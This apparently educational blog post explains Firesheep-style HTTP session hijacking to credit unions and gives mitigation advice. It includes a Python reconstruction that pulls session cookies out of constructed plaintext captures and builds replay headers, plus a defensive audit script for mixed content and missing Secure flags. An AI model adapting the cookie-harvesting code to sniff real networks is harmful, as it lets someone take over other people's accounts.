What do you suppose could happen if a person with malicious intent was able to gain access to the Facebook account of a credit union CEO? What about a corporate Twitter account? An old hacking technique called HTTP session hijacking has recently been brought back into the spotlight with the release of Firesheep by Eric Butler, covered by TechCrunch.
When you sign in to an online service, such as your email, online banking, Facebook, or Flickr, the website gives your browser a session cookie, and the browser sends that cookie back with every later request to prove that you are the person who logged in. Generally the login page itself is served over SSL, so your password is encrypted in transit. However, as is the case with Facebook and Flickr, once you have logged in the site drops you back onto regular, unencrypted HTTP, and the session cookie travels in the clear with every page you load. Firesheep is an extension for Firefox that sniffs the traffic on a network and picks out the session cookies for sites like Facebook. Because that cookie is the only thing the site uses to recognize you, anyone who copies it can present it from their own browser and the site cannot tell them apart from you. Firesheep makes this as easy as installing the plugin and clicking a button: it sits there gathering cookies from across the network, presents you with a list of the people it has found, and a double-click logs you in to someone else's Facebook account. The flaw is not in the cookie itself but in sending it over HTTP. A site that serves every page over SSL and marks its session cookie with the Secure attribute (so the browser will never send it over plain HTTP) gives a sniffer nothing to copy.
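To make the mechanics concrete, here is an added example (written for this post, not Firesheep's own code) that reconstructs the sidejacking step in Python: it parses plaintext HTTP requests as a sniffer on an open network would see them, pulls out the cookies a site uses to identify a logged-in user, and builds the headers an attacker would replay from their own browser. The captured requests, hostnames and cookie names are all constructed for the illustration.

```python
"""Added example (not part of the original post, and not Firesheep's code):
a minimal reconstruction of the 'sidejacking' step Firesheep automates.
Given raw HTTP requests as they appear on the wire of an open wireless
network, pull out the session cookie and build the headers an attacker
would replay to impersonate the victim. The capture below is constructed
for the example; the hostnames, cookie names and values are made up."""

# Constructed sample capture: plaintext HTTP requests as a sniffer would
# see them on an unencrypted wifi network (hypothetical hostnames).
CAPTURED_REQUESTS = [
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.example-social.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: c_user=100001234; xs=f1e2d3c4b5a6; locale=en_US\r\n"
    b"\r\n",
    b"GET /photos/ HTTP/1.1\r\n"
    b"Host: www.example-photos.test\r\n"
    b"Cookie: session_id=7a9c2b1e\r\n"
    b"\r\n",
    # A request with no cookie at all: nothing to steal here.
    b"GET / HTTP/1.1\r\n"
    b"Host: news.example.test\r\n"
    b"\r\n",
]

# Cookie names that carry a login session for the sites we care about.
# Firesheep ships a per-site handler with this knowledge; these entries
# are illustrative, not Firesheep's real handler list.
SESSION_COOKIES = {
    "www.example-social.test": {"c_user", "xs"},
    "www.example-photos.test": {"session_id"},
}


def parse_request(raw):
    """Return (host, cookies) from one raw HTTP request; cookies is a dict."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    host, cookies = None, {}
    for line in lines[1:]:                 # skip the request line
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value
        elif name == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                if k:
                    cookies[k] = v
    return host, cookies


def harvest_sessions(captures, handlers=SESSION_COOKIES):
    """Collect stealable sessions as {host: {cookie: value}} for hosts
    whose full set of session cookies was sent in the clear."""
    found = {}
    for raw in captures:
        host, cookies = parse_request(raw)
        wanted = handlers.get(host)
        if not wanted or not wanted.issubset(cookies):
            continue
        found[host] = {k: cookies[k] for k in sorted(wanted)}
    return found


def replay_headers(host, session):
    """Headers an attacker attaches to their own request to the site.
    The server cannot tell this from the victim's browser: the cookie is
    the only proof of identity it ever asked for."""
    cookie = "; ".join(f"{k}={v}" for k, v in session.items())
    return {"Host": host, "Cookie": cookie}


if __name__ == "__main__":
    for host, session in harvest_sessions(CAPTURED_REQUESTS).items():
        print(host, replay_headers(host, session))
```

Nothing here is clever: the attacker never sees the victim's password, only the cookie the site handed out after the password was checked, and that is enough because the site trusts the cookie alone. Put the whole site behind SSL and mark the cookie Secure, and the second request in the capture above simply never appears on the wire.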
Where Firesheep is incredibly scary is on unsecured wireless networks. Think Starbucks, McDonalds, and hotels. Now think about how many credit union employees use services like that when they travel. I’ve used an unencrypted wifi network every week this month where someone could have logged into my Facebook account, done whatever they wished, and I never would have been the wiser until a friend called me and asked if I really wanted $1000 wired to Western Union in the Netherlands.
Credit unions need to realize a few key things:
- Unencrypted wifi makes this easy, but it isn't the root cause. The root cause is websites your users visit that don't protect the whole session end to end with SSL; a cookie sent over plain HTTP can be read on any network the attacker is able to sniff.
- Your employees are going to use free wifi with the corporate assets, whether you like it or not.
- You need to have the tools in place to minimize the risk of this happening to your CEO.
So how can credit unions, their employees, and regular users prevent issues like this?
- Your credit union probably already has VPN access. Force your remote users to VPN back to the CU for all of their traffic (no split tunneling) and go out to the internet from there. The traffic can still be intercepted once it leaves the credit union, but the person sitting across the coffee shop sees only an encrypted tunnel, which is a much harder target.
- Make 100% sure that every asset in online banking, including images and remote scripts, is served over SSL. A single image or script loaded over plain HTTP sends the session cookie in the clear right along with it, and browsers will warn members about the mixed content.
- Put your entire member-facing website behind SSL, not just the login page. An extended validation certificate is a nice bonus for members who look for the green bar, but it is the site-wide encryption that stops the sniffing.
- Avoid using unencrypted wifi access points at all costs.
- Educate your staff on the security issues with unencrypted wifi and the appropriate use of strong passwords.
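As an added example (not from the original post), here is a small Python audit for the two site-side items above: it lists every subresource of a page served over HTTPS that would still be fetched over plain http, and it flags cookies that are set without the Secure attribute. The sample page, Set-Cookie headers and hostnames are all constructed for the illustration.

```python
"""Added example (not part of the original post): a small audit for two of
the checklist items. (1) Every subresource of a page served over HTTPS
(images, scripts, stylesheets, frames, form targets) must itself use HTTPS,
otherwise the browser sends the session cookie in the clear to fetch it.
(2) The session cookie must carry the Secure attribute, so the browser
refuses to send it over plain HTTP even when a link or a typo leads the
member to http://. The page, headers and hostnames below are made up."""

from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a login page as served from the HTTPS site.
PAGE_URL = "https://onlinebanking.example-cu.test/login"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="/static/site.css">
<script src="http://cdn.example-analytics.test/track.js"></script>
</head><body>
<img src="//images.example-cu.test/logo.png">
<img src="http://www.example-cu.test/img/banner.gif">
<iframe src="https://chat.example-vendor.test/widget"></iframe>
<form action="http://www.example-cu.test/login" method="post"></form>
</body></html>
"""

# Constructed sample Set-Cookie headers from the login response.
SAMPLE_SET_COOKIES = [
    "OBSESSION=9f8e7d6c5b4a; Path=/; HttpOnly",
    "lang=en; Path=/",
    "csrf=ab12cd34; Path=/; Secure; HttpOnly",
]

# Tag attributes that make the browser fetch from, or post to, another URL.
URL_ATTRS = {
    "img": ("src",), "script": ("src",), "link": ("href",),
    "iframe": ("src",), "form": ("action",), "embed": ("src",),
    "object": ("data",),
}


class SubresourceCollector(HTMLParser):
    """Collect (tag, absolute URL) for every subresource reference."""

    def __init__(self, base):
        super().__init__()
        self.base = base
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name in URL_ATTRS.get(tag, ()):
            for k, v in attrs:
                if k == name and v:
                    self.found.append((tag, urljoin(self.base, v)))


def find_mixed_content(html, base=PAGE_URL):
    """Return (tag, url) pairs that an https page would load over plain http.
    Scheme-relative '//host/path' URLs inherit https from the base and pass."""
    parser = SubresourceCollector(base)
    parser.feed(html)
    return [(t, u) for t, u in parser.found if urlsplit(u).scheme == "http"]


def insecure_cookies(set_cookie_headers):
    """Return the names of cookies set without the Secure attribute."""
    bad = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].partition("=")[0]
        attrs = {p.partition("=")[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            bad.append(name)
    return bad


if __name__ == "__main__":
    for tag, url in find_mixed_content(SAMPLE_HTML):
        print(f"mixed content: <{tag}> loads {url}")
    for name in insecure_cookies(SAMPLE_SET_COOKIES):
        print(f"cookie without Secure attribute: {name}")
```

Run against a real page you would feed it the HTML and Set-Cookie headers from a fetch of your own online banking site. In the constructed sample, the analytics script, the banner image and the login form all point at plain http, and the OBSESSION session cookie is missing the Secure flag: exactly the combination that lets a sniffer pick the session up from a member on coffee-shop wifi.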
Banning the use of wifi, Facebook, or whatever else isn't the solution here. The best way to solve these issues is to educate your employees and users so they understand the ramifications of using insecure technology, and to fix the sites you control so a stolen cookie is never on the wire to steal.